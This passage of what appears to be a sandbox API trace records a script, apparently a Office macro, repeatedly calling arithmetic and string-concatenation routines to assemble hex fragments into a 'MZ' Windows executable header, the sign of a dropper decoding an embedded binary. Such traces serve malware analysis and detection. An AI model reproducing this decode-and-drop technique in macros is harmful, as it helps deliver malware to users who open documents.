pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.120] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.120] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.120] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.120] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.120] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.120] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.120] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.120] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.120] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.120] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.120] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.120] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.120] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.120] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.120] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.121] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.121] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.121] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.121] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.121] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.121] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.121] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.121] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.122] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.122] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.122] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.122] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.122] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.122] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.122] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.122] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.122] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.122] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.122] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.122] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.122] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.122] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.122] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.122] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.122] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.122] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.123] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.123] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.123] VarBstrCat (in: bstrLeft="", bstrRight="400000", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.124] VarBstrCat (in: bstrLeft="&H", bstrRight="40", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.124] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.124] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.124] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.124] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.124] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="@", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.125] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.125] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.125] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.125] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.125] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.125] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.125] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.125] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.125] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.125] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.125] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.125] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.125] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.125] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.125] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.125] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.126] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.126] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.126] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.126] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.126] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.126] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.126] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.126] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.126] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.126] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.126] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.127] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.127] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.127] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.127] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.127] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.127] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.127] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.128] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.128] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.128] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.128] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.128] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.128] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.128] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.128] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.128] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.129] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.129] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.129] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.130] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.130] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.130] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.130] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.130] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.130] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.130] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.130] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.130] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.130] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.131] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.131] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.131] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.131] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.131] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.131] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.131] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.131] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.131] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.131] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.131] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.131] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.131] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.131] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.131] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.131] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.131] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.132] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.132] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.132] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.132] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.132] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.132] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.132] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.132] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.132] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.132] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.132] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.133] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.133] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.133] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.133] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.133] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.133] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.133] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.133] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.133] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.133] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.133] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.133] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.133] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.133] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.133] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.133] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.133] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.134] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.134] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.134] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.134] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.134] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.134] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.134] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.134] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.134] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.134] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.135] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.135] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.135] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.135] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.135] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.135] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.135] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.135] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.135] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.135] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.135] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.135] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.136] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.136] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.136] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.136] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.136] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.136] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.136] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.136] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.136] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.136] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.136] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.136] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.136] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.136] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.137] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.137] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.137] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.137] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.137] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.137] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.137] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) 